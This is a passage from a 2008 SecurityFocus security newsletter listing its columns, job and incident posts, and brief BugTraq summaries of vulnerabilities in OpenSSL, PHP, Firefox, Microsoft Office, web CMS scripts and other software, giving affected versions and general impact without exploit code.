Tuesday, May 13, 2008

SecurityFocus Newsletter #453
----------------------------------------

This issue is sponsored by Solidcore Systems Inc.

PCI DSS Compliance for $50/Node
The QSA's choice for low-cost automation of 30 PCI DSS controls on servers, databases, and network devices.
Watch the Demo now! http://www.solidcore.com/landing_pages/PCI_Tour_sf.html


SECURITY BLOGS
SecurityFocus has selected a few syndicated sources that stand out as conveying topics of interest for our community. We are proud to offer content from Matasano at this time and will be adding more in the coming weeks.
http://www.securityfocus.com/blogs

------------------------------------------------------------------
I. FRONT AND CENTER
1. Click Crime
2. Just Who's Being Exploited?
II. BUGTRAQ SUMMARY
1. Debian OpenSSL Package Random Number Generator Weakness
2. CDF (Common Data Format) Library 'src/lib/cdfread64.c' Stack Based Buffer Overflow Vulnerability
3. Audacity Insecure Temporary File Creation Vulnerability
4. CUPS PNG Filter Multiple Integer Overflow Vulnerabilities
5. Libpng Library Unknown Chunk Handler Vulnerability
6. Mozilla Thunderbird/Seamonkey/Firefox 2.0.0.12 Multiple Remote Vulnerabilities
7. PHP 5.2.5 and Prior Versions Multiple Vulnerabilities
8. Sun Solaris Print Service Unspecified Remote Code Execution Vulnerability
9. PHP 5.2.3 and Prior Versions Multiple Vulnerabilities
10. PHP Glob() Function Arbitrary Code Execution Vulnerability
11. Perl Unicode '\Q...\E' Quoting Construct Regular Expression Buffer Overflow Vulnerability
12. rdesktop Multiple Remote Memory Corruption Vulnerabilities
13. TCL/TK Tk Toolkit 'ReadImage()' GIF File Buffer Overflow Vulnerability
14. Microsoft Windows CE JPEG And GIF Processing Multiple Arbitrary Code Execution Vulnerabilities
15. PHP 5 'php_sprintf_appendstring()' Remote Integer Overflow Vulnerability
16. Bugzilla Security Bypass and Cross Site Scripting Vulnerabilities
17. Nagios Unspecified Cross-Site Scripting Vulnerability
18. MoinMoin Multiple ACL Security Bypass Vulnerabilities
19. OpenOffice Multiple Heap Based Buffer Overflow Vulnerabilities
20. KDE 'start_kdeinit' Multiple Local Privilege Escalation Vulnerabilities
21. Rsync 'xattr' Support Integer Overflow Vulnerability
22. Poppler and Xpdf PDF Rendering Library Embedded Font Remote Code Execution Vulnerability
23. bzip2 Unspecified File Handling Vulnerability
24. KDE KHTML PNGLoader Heap Buffer Overflow Vulnerability
25. Mozilla Firefox/SeaMonkey JavaScript Garbage Collector Memory Corruption Vulnerability
26. Squid Web Proxy Cache 'arrayShrink()' Remote Denial of Service Vulnerability
27. Microsoft Word CSS Handling Memory Corruption Remote Code Execution Vulnerability
28. Mega File Hosting Script 'members.php' SQL Injection Vulnerability
29. PhpMyAgenda 'infoevent.php3' Remote File Include Vulnerability
30. Microsoft Word RTF Malformed String Handling Memory Corruption Remote Code Execution Vulnerability
31. QEMU 'vl.c' Security Bypass Vulnerability
32. QEMU Multiple Local Vulnerabilities
33. Xen 'xenmon.py' and 'xenbaked' Insecure Temporary File Creation Vulnerability
34. Microsoft Windows Intelligent Input/Output (I2O) Multiple Local Privilege Escalation Vulnerabilities
35. Microsoft Jet DataBase Engine MDB File Parsing Remote Buffer Overflow Vulnerability
36. Microsoft Publisher Memory Object Handler Data Remote Code Execution Vulnerability
37. CMS Made Simple 'modules/FileManager/postlet/javaUpload.php' Arbitrary File Upload Vulnerability
38. Microsoft Malware Protection Engine Disk Space Exhaustion Remote Denial Of Service Vulnerability
39. Microsoft Malware Protection Engine File Processing Remote Denial Of Service Vulnerability
40. Fusebox 'fusebox5.php' Remote File Include Vulnerability
41. Editorial 'admin/index.php3' SQL Injection Vulnerability
42. HP FTP Unspecified Remote Denial of Service Vulnerability
43. Claroline Multiple Remote File Include Vulnerabilities
44. Cisco User-Changeable Password (UCP) 'CSuserCGI.exe' Multiple Remote Vulnerabilities
45. BIGACE 'GLOBALS[_BIGACE][DIR]' Parameter Multiple Remote File Include Vulnerabilities
46. IBD Micro CMS 'microcms-admin-login.php' Multiple SQL Injection Vulnerabilities
47. ClanLite SQL Injection and Cross-Site Scripting Vulnerabilities
48. AJ Dating 'view_profile.php' SQL Injection Vulnerability
49. OpenSSL Montgomery Exponentiation Side-Channel Local Information Disclosure Vulnerability
50. OpenSSL DTLS Heap Buffer Overflow Vulnerability
51. CyrixMED 'index.php' Cross Site Scripting Vulnerability
52. Linux Kernel 'fcntl_setlk()' SMP Ordering Local Denial of Service Vulnerability
53. T1lib intT1_Env_GetCompletePath Buffer Overflow Vulnerability
54. teTeX Mkind.C Remote Buffer Overflow Vulnerability
55. teTeX DVI File Parsing Multiple Vulnerabilities
56. GD Graphics Library Multiple Vulnerabilities
57. Xpdf Multiple Remote Stream.CC Vulnerabilities
58. KDE KPDF/KWord/XPDF StreamPredictor Function Stack Buffer Overflow Vulnerability
59. GD Graphics Library PNG File Processing Denial of Service Vulnerability
60. PCRE Regular Expression Library UTF-8 Options Multiple Remote Denial of Service Vulnerabilities
61. Meto Forum 'forum/kategori.asp' SQL Injection Vulnerability
62. WGCC Web Group Communication Center Cross-Site Scripting and SQL Injection Vulnerabilities
63. Build A Niche Store 'q' Parameter Cross-Site Scripting Vulnerability
64. Xen Para-Virtualized Framebuffer Message Format Denial Of Service Vulnerability
65. Zogo-shop 'products.php' SQL Injection Vulnerability
66. EQdkp 'user_id' Parameter SQL Injection Vulnerability
67. Xen Para Virtualized Frame Buffer Backend Local Denial of Service Vulnerability
68. TYPO3 WT Gallery Extension Multiple Input Validation Vulnerabilities
69. e107 BLOG Engine 'comment.php' SQL Injection Vulnerability
70. TYPO3 Event Database Extension Unspecified Cross Site Scripting Vulnerability
71. ActualScripts ActualAnalyzer 'view.php' Cross-Site Scripting Vulnerability
72. PCRE Regular Expression Library Multiple Integer and Buffer Overflow Vulnerabilities
73. PCRE Regular Expression Library Multiple Security Vulnerabilities
74. Apache HTTP Server 403 Error Cross-Site Scripting Vulnerability
75. ZeusCart 'category_list.php' SQL Injection Vulnerability
76. phpInstantGallery Multiple Cross-Site Scripting Vulnerabilities
77. Joomla! and Mambo xsstream-dm Component 'movie' Parameter SQL Injection Vulnerability
78. AJ Classifieds 'index.php' SQL Injection Vulnerability
79. AJ Auction 'classifide_ad.php' SQL Injection Vulnerability
80. AJ Article 'featured_article.php' SQL Injection Vulnerability
81. Blender 'radiance_hdr.c' Remote Buffer Overflow Vulnerability
82. Blender Unspecified Insecure Temporary File Creation Vulnerability
83. WordPress WP Photo Album Plugin 'photo' Parameter SQL Injection Vulnerability
84. Vortex CMS 'index.php' SQL Injection Vulnerability
85. QuickUpCMS Multiple SQL Injection Vulnerabilities
86. PhpBlock Multiple Remote File Include Vulnerabilities
87. OtherLogic 'vocourse.php' SQL Injection Vulnerability
88. Advanced Links Management 'read.php' SQL Injection Vulnerability
89. SARG Multiple Unspecified Buffer Overflow Vulnerabilities
90. Joomla! and Mambo Datsogallery Component 'sub_votepic.php' SQL Injection Vulnerability
91. Linux Kernel 'sys_utimensat' Local Denial of Service Vulnerability
92. BlogPHP Multiple HTML Injection, Cross-Site Scripting and Cookie Manipulation Vulnerabilities
93. Phoenix View CMS 'admin_frame.php' Cross-Site Scripting Vulnerability
94. Ktools PhotoStore Multiple SQL Injection Vulnerabilities
95. Ktools PhotoStore 'gallery.php' SQL Injection Vulnerability
96. txtCMS 'index.php' Local File Include Vulnerability
97. Admidio 'get_file.php' Local File Include Vulnerability
98. Red Hat Directory Server LDAP Query Patterns Buffer Overflow Vulnerability
99. ZoneMinder Multiple Unspecified Remote Code Execution Vulnerabilities
100. SIPp 'call.cpp' Remote Buffer Overflow Vulnerability
III. SECURITYFOCUS NEWS
1. Groups warn travelers to limit laptop data
2. Patches pose significant risk, researchers say
3. U.S. gov't pushes cybersecurity at con
4. Web developers, fix thy Flash
IV. SECURITY JOBS LIST SUMMARY
1. [SJ-JOB] Quality Assurance, Alpharetta
2. [SJ-JOB] Security Researcher, Centreville, VA
3. [SJ-JOB] Forensics Engineer, Arlington
4. [SJ-JOB] Sr. Product Manager, San Jose
5. [SJ-JOB] Application Security Engineer, New York
6. [SJ-JOB] Security Auditor, South Portland
7. [SJ-JOB] Application Security Engineer, Philadelphia
8. [SJ-JOB] Sales Representative, San Jose
9. [SJ-JOB] Security Architect, South Portland
10. [SJ-JOB] Security Consultant, Mission Viejo
11. [SJ-JOB] Security Consultant, Dallas
12. [SJ-JOB] Security Consultant, Chicago
13. [SJ-JOB] Security Consultant, Various
14. [SJ-JOB] Forensics Engineer, Mission Viejo
15. [SJ-JOB] Security Consultant, Calgary
V. INCIDENTS LIST SUMMARY
1. Distributed Bruteforce against SSH
2. Possible Zombie/Bot?
3. Malware IRC/DNS Network Activity
4. Weird SSH attack last night and this morning (still ongoing)
VI. VULN-DEV RESEARCH LIST SUMMARY
VII. MICROSOFT FOCUS LIST SUMMARY
1. XP Hardening
2. SecurityFocus Microsoft Newsletter #393
3. Binding Windows Services to Specific Addresses Only
VIII. SUN FOCUS LIST SUMMARY
IX. LINUX FOCUS LIST SUMMARY
X. UNSUBSCRIBE INSTRUCTIONS
XI. SPONSOR INFORMATION

I. FRONT AND CENTER
---------------------
1. Click Crime
By Mark Rasch
It has long been a crime not only to commit an illegal act, but also to attempt -- or conspire with others -- to commit one.

http://www.securityfocus.com/columnists/471

2. Just Who's Being Exploited?
By Jamie Reid
Last month's revelation that Tipping Point paid out a prize of $10,000 and a new laptop (MSRP: about $2000) at the CanSecWest conference, for the privilege of being the exclusive licensor of a heretofore unpublished vulnerability in Apple's Safari web browser to researcher Charles Miller of Independent Security Evaluators, may lend some credence to this adage.
http://www.securityfocus.com/columnists/470


II. BUGTRAQ SUMMARY
--------------------
1. Debian OpenSSL Package Random Number Generator Weakness
BugTraq ID: 29179
Remote: Yes
Last Updated: 2008-05-13
Relevant URL: http://www.securityfocus.com/bid/29179
Summary:
The Debian OpenSSL package is prone to a random-number-generator weakness.

Attackers can exploit this issue to predict random data used to generate encryption keys by certain applications. This may help attackers compromise encryption keys and gain access to sensitive data.

This issue affects only a modified OpenSSL package for Debian prior to version 0.9.8c-4etch3.

2. CDF (Common Data Format) Library 'src/lib/cdfread64.c' Stack Based Buffer Overflow Vulnerability
BugTraq ID: 29045
Remote: Yes
Last Updated: 2008-05-13
Relevant URL: http://www.securityfocus.com/bid/29045
Summary:
The CDF (Common Data Format) library is prone to a stack-based buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data when processing CDF files.

Attackers can exploit this issue by enticing unsuspecting users to open malicious files. Successful exploits will allow code to run with the privileges of the user. Failed attacks will cause denial-of-service conditions.

CDF 3.2 and prior versions are vulnerable.

3. Audacity Insecure Temporary File Creation Vulnerability
BugTraq ID: 26608
Remote: No
Last Updated: 2008-05-12
Relevant URL: http://www.securityfocus.com/bid/26608
Summary:
Audacity is prone to a security vulnerability because it creates temporary files in an insecure manner.

An attacker with local access could potentially exploit this issue to perform symlink attacks, overwriting arbitrary files in the context of the affected application.

Successfully mounting a symlink attack may allow the attacker to delete or corrupt sensitive files, which may result in a denial of service. Other attacks may also be possible.

This issue affects Audacity 1.3.2; other versions may also be vulnerable.

4. CUPS PNG Filter Multiple Integer Overflow Vulnerabilities
BugTraq ID: 28781
Remote: Yes
Last Updated: 2008-05-12
Relevant URL: http://www.securityfocus.com/bid/28781
Summary:
CUPS is prone to multiple integer-overflow vulnerabilities because it fails to perform adequate boundary checks on user-supplied PNG image sizes before using them to allocate memory buffers.

Successful exploits may allow attackers to execute arbitrary code with the privileges of a user running the utilities. Failed exploit attempts likely cause denial-of-service conditions.

CUPS 1.3.7 is vulnerable; other versions may also be affected.

5. Libpng Library Unknown Chunk Handler Vulnerability
BugTraq ID: 28770
Remote: Yes
Last Updated: 2008-05-12
Relevant URL: http://www.securityfocus.com/bid/28770
Summary:
The 'libpng' library is prone to a vulnerability that causes denial-of-service conditions or may allow code to run. The issue occurs because the software fails to properly handle unexpected chunk data in PNG files.

Successfully exploiting this issue allows remote attackers to trigger denial-of-service conditions or to possibly execute arbitrary machine code in the context of applications that use the library.

The following versions are affected:

libpng 1.0.6 through 1.0.32
libpng 1.2.0 through 1.2.26
libpng 1.4.0beta01 through 1.4.0beta19

6. Mozilla Thunderbird/Seamonkey/Firefox 2.0.0.12 Multiple Remote Vulnerabilities
BugTraq ID: 28448
Remote: Yes
Last Updated: 2008-05-12
Relevant URL: http://www.securityfocus.com/bid/28448
Summary:
The Mozilla Foundation has released multiple security advisories specifying various vulnerabilities in Firefox 2.0.0.12 and prior versions.

Exploiting these issues can allow attackers to:

- steal authentication credentials
- obtain potentially sensitive information
- violate the same-origin policy
- execute scripts with elevated privileges
- cause denial-of-service conditions
- potentially execute arbitrary code
- perform cross-site request-forgery attacks

Other attacks are possible.

These issues are present in Firefox 2.0.0.12 and prior versions. Many of these issues are present in Mozilla Thunderbird 2.0.0.12 and prior versions as well as SeaMonkey 1.1.8 and prior versions.

UPDATE: Versions of Mozilla Thunderbird prior to 2.0.0.14 are affected by issues described in MFSA 2008-14 and MFSA 2008-15.

7. PHP 5.2.5 and Prior Versions Multiple Vulnerabilities
BugTraq ID: 29009
Remote: Yes
Last Updated: 2008-05-12
Relevant URL: http://www.securityfocus.com/bid/29009
Summary:
PHP 5.2.5 and prior versions are prone to multiple security vulnerabilities.

Successful exploits could allow an attacker to bypass security restrictions, cause a denial-of-service condition, and potentially execute code.

These issues are reported to affect PHP 5.2.5 and prior versions.

8. Sun Solaris Print Service Unspecified Remote Code Execution Vulnerability
BugTraq ID: 29135
Remote: Yes
Last Updated: 2008-05-12
Relevant URL: http://www.securityfocus.com/bid/29135
Summary:
Sun Solaris Print Service is prone to an unspecified remote code-execution vulnerability.

This issue allows remote attackers to execute arbitrary machine code with SYSTEM-level privileges on affected computers. Failed exploit attempts will result in denial-of-service conditions.

No further technical details are currently available. We will update this BID as more information emerges.

9. PHP 5.2.3 and Prior Versions Multiple Vulnerabilities
BugTraq ID: 25498
Remote: Yes
Last Updated: 2008-05-12
Relevant URL: http://www.securityfocus.com/bid/25498
Summary:
PHP 5.2.3 and prior versions are prone to multiple security vulnerabilities. Successful exploits could allow an attacker to bypass security restrictions, cause a denial-of-service condition, and potentially execute code.

10. PHP Glob() Function Arbitrary Code Execution Vulnerability
BugTraq ID: 24922
Remote: Yes
Last Updated: 2008-05-12
Relevant URL: http://www.securityfocus.com/bid/24922
Summary:
PHP is prone to a vulnerability that lets attackers execute arbitrary code.

An attacker can exploit this issue to execute arbitrary machine code in the context of the affected application or to cause denial-of-service conditions.

This issue affects PHP 5.2.3 and 4.4.4. Other versions may also be affected.

11. Perl Unicode '\Q...\E' Quoting Construct Regular Expression Buffer Overflow Vulnerability
BugTraq ID: 28928
Remote: Yes
Last Updated: 2008-05-12
Relevant URL: http://www.securityfocus.com/bid/28928
Summary:
Perl is prone to a buffer-overflow vulnerability because it fails to sufficiently bounds-check user-supplied input.

Successfully exploiting this issue may allow attackers to execute arbitrary machine code in the context of Perl applications using regular expressions in a vulnerable manner. This facilitates the remote compromise of affected computers. Failed exploits can cause denial-of-service conditions.

Perl 5.8.8 is vulnerable to this issue; other versions may also be affected.

NOTE: This issue may be related to BID 26350 ('Perl Unicode Regular Expression Buffer Overflow Vulnerability').

12. rdesktop Multiple Remote Memory Corruption Vulnerabilities
BugTraq ID: 29097
Remote: Yes
Last Updated: 2008-05-12
Relevant URL: http://www.securityfocus.com/bid/29097
Summary:
The 'rdesktop' program is prone to multiple remote memory-corruption vulnerabilities because it fails to properly validate incoming packets.

A remote attacker can exploit these issues to execute arbitrary code in the context of the currently logged-in user.

These issues affect rdesktop 1.5.0; other versions may also be vulnerable.

13. TCL/TK Tk Toolkit 'ReadImage()' GIF File Buffer Overflow Vulnerability
BugTraq ID: 27655
Remote: Yes
Last Updated: 2008-05-12
Relevant URL: http://www.securityfocus.com/bid/27655
Summary:
TCL/TK Tk Toolkit is prone to a buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied GIF image data before copying it to an insufficiently sized buffer.

Successful exploits may allow attackers to execute arbitrary code in the context of applications that use the affected toolkit. Failed exploit attempts likely result in denial-of-service conditions.

Versions prior to TCL/TK 8.5.1 are vulnerable to this issue.

14. Microsoft Windows CE JPEG And GIF Processing Multiple Arbitrary Code Execution Vulnerabilities
BugTraq ID: 29147
Remote: Yes
Last Updated: 2008-05-12
Relevant URL: http://www.securityfocus.com/bid/29147
Summary:
Microsoft Windows CE is prone to multiple vulnerabilities that allow attackers to execute arbitrary code. The issues stem from unspecified errors.

An attacker can exploit these issues to execute arbitrary code within the context of the affected components. Failed exploit attempts will likely result in denial-of-service conditions.

15. PHP 5 'php_sprintf_appendstring()' Remote Integer Overflow Vulnerability
BugTraq ID: 28392
Remote: Yes
Last Updated: 2008-05-12
Relevant URL: http://www.securityfocus.com/bid/28392
Summary:
PHP 5 is prone to an integer-overflow vulnerability because the software fails to ensure that integer values are not overrun.

Successful exploits of this vulnerability allow remote attackers to execute arbitrary machine code in the context of a webserver affected by the issue. Failed attempts will likely result in denial-of-service conditions.

PHP 5.2.5 and prior versions are vulnerable.

16. Bugzilla Security Bypass and Cross Site Scripting Vulnerabilities
BugTraq ID: 29038
Remote: Yes
Last Updated: 2008-05-12
Relevant URL: http://www.securityfocus.com/bid/29038
Summary:
Bugzilla is prone to a security-bypass and a cross-site scripting vulnerability because it fails to properly validate user credentials and sanitize user-supplied input.

An attacker may leverage the cross-site scripting issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.

The attacker may leverage the security-bypass issue to modify the status of bugs, despite the attacker's insufficient privileges.

Bugzilla 2.17.2 and 3.1.3 are vulnerable; other versions may also be affected.

17. Nagios Unspecified Cross-Site Scripting Vulnerability
BugTraq ID: 29140
Remote: Yes
Last Updated: 2008-05-12
Relevant URL: http://www.securityfocus.com/bid/29140
Summary:
Nagios is prone to an unspecified cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

18. MoinMoin Multiple ACL Security Bypass Vulnerabilities
BugTraq ID: 28869
Remote: Yes
Last Updated: 2008-05-12
Relevant URL: http://www.securityfocus.com/bid/28869
Summary:
MoinMoin is prone to multiple security-bypass vulnerabilities because it fails to properly handle Access Control List (ACL) entries.

Successful exploits will allow attackers to bypass certain security restrictions and gain unauthorized access to administrative functionality. This in turn may lead to a compromise of the affected application.

Versions prior to MoinMoin 1.6.3 are affected.

19. OpenOffice Multiple Heap Based Buffer Overflow Vulnerabilities
BugTraq ID: 28819
Remote: Yes
Last Updated: 2008-05-12
Relevant URL: http://www.securityfocus.com/bid/28819
Summary:
OpenOffice is prone to multiple remote heap-based buffer-overflow vulnerabilities because of errors in processing certain files.

Remote attackers can exploit these issues by enticing victims into opening maliciously crafted ODF, Quattro Pro, EMF, or OLE files.

Successful exploits may allow attackers to execute arbitrary code within the context of the affected application. Failed exploit attempts will likely result in a denial of service.

The issues affect OpenOffice 2 prior to 2.4. The OLE and EMF file issues also affect OpenOffice 1.1.

20. KDE 'start_kdeinit' Multiple Local Privilege Escalation Vulnerabilities
BugTraq ID: 28938
Remote: No
Last Updated: 2008-05-12
Relevant URL: http://www.securityfocus.com/bid/28938
Summary:
The 'start_kdeinit' utility in KDE is prone to multiple local privilege-escalation vulnerabilities because it fails to properly sanitize input.

Successful attacks allow local users to send signals to arbitrary processes, triggering denial-of-service conditions. Attackers may also be able to execute arbitrary code with elevated privileges, facilitating the complete compromise of affected computers.

21. Rsync 'xattr' Support Integer Overflow Vulnerability
BugTraq ID: 28726
Remote: Yes
Last Updated: 2008-05-12
Relevant URL: http://www.securityfocus.com/bid/28726
Summary:
The rsync utility is prone to a remote integer-overflow vulnerability because the application fails to properly ensure that user-supplied input doesn't overflow integer values. This may result in user-supplied data being copied past the end of a memory buffer.

Attackers may exploit this issue to execute arbitrary machine code in the context of the affected application, facilitating the compromise of affected computers.

Versions of rsync between 2.6.9 and 3.0.1 that have 'xattr' support enabled are vulnerable.

22. Poppler and Xpdf PDF Rendering Library Embedded Font Remote Code Execution Vulnerability
BugTraq ID: 28830
Remote: Yes
Last Updated: 2008-05-12
Relevant URL: http://www.securityfocus.com/bid/28830
Summary:
The Poppler and Xpdf PDF rendering library is prone to a remote code-execution vulnerability because the software fails to properly validate user-supplied data.

Successfully exploiting this issue allows attackers to execute arbitrary machine code in the context of applications that use the library. Failed exploit attempts likely result in denial-of-service conditions.

23. bzip2 Unspecified File Handling Vulnerability
BugTraq ID: 28286
Remote: Yes
Last Updated: 2008-05-12
Relevant URL: http://www.securityfocus.com/bid/28286
Summary:
The 'bzip2' application is prone to a remote file-handling vulnerability because the application fails to properly handle malformed files.

Successful exploits may allow remote code to run, but this has not been confirmed. Exploit attempts will likely crash the application.

This issue affects bzip2 1.0.4; prior versions may also be affected.

24. KDE KHTML PNGLoader Heap Buffer Overflow Vulnerability
BugTraq ID: 28937
Remote: Yes
Last Updated: 2008-05-12
Relevant URL: http://www.securityfocus.com/bid/28937
Summary:
KDE KHTML is prone to a remote buffer-overflow vulnerability because it fails to perform adequate bounds checking for user-supplied input while processing malicious PNG files.

Successful exploits allow remote attackers to execute arbitrary machine code in the context of applications that use KHTML. Failed exploit attempts will likely crash applications.

KHTML 4.0 through 4.0.3, as shipped with KDE, is affected by this issue. Since KHTML is included in other third-party packages, they may also be affected, but this has not been confirmed.

25. Mozilla Firefox/SeaMonkey JavaScript Garbage Collector Memory Corruption Vulnerability
BugTraq ID: 28818
Remote: Yes
Last Updated: 2008-05-12
Relevant URL: http://www.securityfocus.com/bid/28818
Summary:
The Mozilla Foundation has released a security advisory disclosing a memory-corruption vulnerability that affects Mozilla Firefox, SeaMonkey, and potentially Thunderbird.

The vulnerability stems from an unspecified error in the JavaScript garbage collector.

Attackers may exploit this issue to crash a vulnerable application or potentially execute arbitrary code in the context of the application.

The issue affects Mozilla Firefox 2.0.0.13 and Mozilla SeaMonkey 1.1.9. Note that Mozilla Thunderbird shares the browser engine with Firefox and may also be vulnerable when JavaScript is enabled in emails.

26. Squid Web Proxy Cache 'arrayShrink()' Remote Denial of Service Vulnerability
BugTraq ID: 28693
Remote: Yes
Last Updated: 2008-05-12
Relevant URL: http://www.securityfocus.com/bid/28693
Summary:
Squid is prone to a remote denial-of-service vulnerability because of a flaw when processing HTTP headers for cached objects.

Successfully exploiting this issue allows remote attackers to crash the affected application, denying further service to legitimate users.

NOTE: This vulnerability was caused by an incorrect fix for the issue described in BID 26687 (Squid Proxy Cache Update Reply Processing Remote Denial of Service Vulnerability; CVE-2007-6239).

This issue affects Squid 2.6 prior to 2.6.STABLE18.

27. Microsoft Word CSS Handling Memory Corruption Remote Code Execution Vulnerability
BugTraq ID: 29105
Remote: Yes
Last Updated: 2008-05-13
Relevant URL: http://www.securityfocus.com/bid/29105
Summary:
Microsoft Word is prone to a remote code-execution vulnerability.

An attacker could exploit this issue by enticing a victim to open a malicious Word file.

Successfully exploiting this issue would allow the attacker to execute arbitrary code in the context of the currently logged-in user.

28. Mega File Hosting Script 'members.php' SQL Injection Vulnerability
BugTraq ID: 29167
Remote: Yes
Last Updated: 2008-05-13
Relevant URL: http://www.securityfocus.com/bid/29167
Summary:
Mega File Hosting Script is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Mega File Hosting Script 1.2 is vulnerable; other versions may also be affected.

29. PhpMyAgenda 'infoevent.php3' Remote File Include Vulnerability
BugTraq ID: 29164
Remote: Yes
Last Updated: 2008-05-13
Relevant URL: http://www.securityfocus.com/bid/29164
Summary:
PhpMyAgenda is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data.

Exploiting this issue may allow an attacker to compromise the application and the underlying system; other attacks are also possible.

PhpMyAgenda 2.1 is vulnerable; other versions may also be affected.

30. Microsoft Word RTF Malformed String Handling Memory Corruption Remote Code Execution Vulnerability
BugTraq ID: 29104
Remote: Yes
Last Updated: 2008-05-13
Relevant URL: http://www.securityfocus.com/bid/29104
Summary:
Microsoft Word is prone to a remote code-execution vulnerability.

An attacker could exploit this issue by enticing a victim to open a malicious RTF file.

Successfully exploiting this issue would allow the attacker to execute arbitrary code in the context of the currently logged-in user.

31. QEMU 'vl.c' Security Bypass Vulnerability
BugTraq ID: 29101
Remote: No
Last Updated: 2008-05-13
Relevant URL: http://www.securityfocus.com/bid/29101
Summary:
QEMU is prone to a security-bypass vulnerability because the application fails to properly restrict access to certain functionality.

Attackers in a guest system can exploit this issue to bypass certain security restrictions and carry out some unauthorized tasks. This may lead to various attacks.

This issue affects QEMU 0.9.1; other versions may also be vulnerable.

32. QEMU Multiple Local Vulnerabilities
BugTraq ID: 23731
Remote: No
Last Updated: 2008-05-13
Relevant URL: http://www.securityfocus.com/bid/23731
Summary:
QEMU is prone to multiple locally exploitable buffer-overflow and denial-of-service vulnerabilities. The buffer-overflow issues occur because the software fails to properly check boundaries of user-supplied input when copying it to insufficiently sized memory buffers. The denial-of-service issues stem from design errors.

Attackers may be able to exploit these issues to escalate privileges, execute arbitrary code, or trigger denial-of-service conditions in the context of the affected applications.

33. Xen 'xenmon.py' and 'xenbaked' Insecure Temporary File Creation Vulnerability
BugTraq ID: 26190
Remote: No
Last Updated: 2008-05-13
Relevant URL: http://www.securityfocus.com/bid/26190
Summary:
Xen is prone to a security vulnerability because it creates temporary files in an insecure manner.

An attacker with local access could potentially exploit this issue to perform symlink attacks, overwriting arbitrary files in the context of the affected application.

Successfully mounting a symlink attack may allow the attacker to overwrite or corrupt sensitive files, which may result in a denial of service. Other attacks may also be possible.

This issue affects Xen 3.0; other versions may also be vulnerable.

34. Microsoft Windows Intelligent Input/Output (I2O) Multiple Local Privilege Escalation Vulnerabilities
BugTraq ID: 29171
Remote: No
Last Updated: 2008-05-13
Relevant URL: http://www.securityfocus.com/bid/29171
Summary:
Microsoft Windows is prone to multiple local privilege-escalation vulnerabilities.

An attacker can exploit these issues to execute arbitrary code with kernel-level privileges. Successfully exploiting these issues will completely compromise affected computers.

These issues affect Windows XP prior to SP3.

35. Microsoft Jet DataBase Engine MDB File Parsing Remote Buffer Overflow Vulnerability
BugTraq ID: 26468
Remote: Yes
Last Updated: 2008-05-13
Relevant URL: http://www.securityfocus.com/bid/26468
Summary:
Microsoft Jet DataBase Engine is prone to a buffer-overflow vulnerability because it fails to properly bounds-check user-supplied data.

Remote attackers can exploit this issue to execute arbitrary machine code in the context of a user running the application. Successful exploits will compromise the affected application and possibly the underlying computer. Failed attacks will likely cause denial-of-service conditions.

NOTE: Further details report that attackers are using malicious Word files to load specially crafted MDB files. Microsoft has released a knowledge base article (950627) documenting this attack vector.

This issue does not affect Windows Server 2003 Service Pack 2, Windows XP Service Pack 3, Windows XP x64 Edition Service Pack 2, Windows Vista, Windows Vista Service Pack 1 and Windows Server 2008 because they run a version of the Jet Database Engine that isn't vulnerable.

This issue does affect the Jet Database Engine, Microsoft Word 2000 Service Pack 3, Microsoft Word 2002 Service Pack 3, Microsoft Word 2003 Service Pack 2, Microsoft Word 2003 Service Pack 3, Microsoft Word 2007, and Microsoft Word 2007 Service Pack 1 on Microsoft Windows 2000, Windows XP, or Windows Server 2003 Service Pack 1.

36. Microsoft Publisher Memory Object Handler Data Remote Code Execution Vulnerability
BugTraq ID: 29158
Remote: Yes
Last Updated: 2008-05-13
Relevant URL: http://www.securityfocus.com/bid/29158
Summary:
Microsoft Publisher is prone to a remote code-execution vulnerability.

An attacker could exploit this issue by enticing a victim to open a malicious Publisher file.

Successfully exploiting this issue would allow the attacker to execute arbitrary code in the context of the currently logged-in user.

37. CMS Made Simple 'modules/FileManager/postlet/javaUpload.php' Arbitrary File Upload Vulnerability
BugTraq ID: 29170
Remote: Yes
Last Updated: 2008-05-13
Relevant URL: http://www.securityfocus.com/bid/29170
Summary:
CMS Made Simple is prone to a vulnerability that lets remote attackers upload and execute arbitrary script code because the application fails to properly validate the content of files being uploaded.

An attacker can leverage this issue to execute arbitrary code on an affected computer with the privileges of the webserver process.

CMS Made Simple 1.2.4 is vulnerable; other versions may also be affected.

38. Microsoft Malware Protection Engine Disk Space Exhaustion Remote Denial Of Service Vulnerability
BugTraq ID: 29073
Remote: Yes
Last Updated: 2008-05-13
Relevant URL: http://www.securityfocus.com/bid/29073
Summary:
Microsoft Malware Protection Engine is prone to a remote denial-of-service vulnerability because it fails to properly validate certain data structures when parsing specially crafted files.

Attackers can exploit this issue to cause an affected computer to stop responding or to restart. Successful attacks will deny service to legitimate users.

39. Microsoft Malware Protection Engine File Processing Remote Denial Of Service Vulnerability
BugTraq ID: 29060
Remote: Yes
Last Updated: 2008-05-13
Relevant URL: http://www.securityfocus.com/bid/29060
Summary:
Microsoft Malware Protection Engine is prone to a remote denial-of-service vulnerability because it fails to properly validate user-supplied input when parsing specially crafted files.

Attackers can exploit this issue to cause an affected computer to stop responding or to restart. Successful attacks will deny service to legitimate users.

40. Fusebox 'fusebox5.php' Remote File Include Vulnerability
BugTraq ID: 29163
Remote: Yes
Last Updated: 2008-05-13
Relevant URL: http://www.securityfocus.com/bid/29163
Summary:
Fusebox is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data.

Exploiting this issue can allow an attacker to compromise the application and the underlying system; other attacks are also possible.

Fusebox 5.5.1 is vulnerable; other versions may also be affected.

41. Editorial 'admin/index.php3' SQL Injection Vulnerability
BugTraq ID: 29161
Remote: Yes
Last Updated: 2008-05-13
Relevant URL: http://www.securityfocus.com/bid/29161
Summary:
Editorial is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

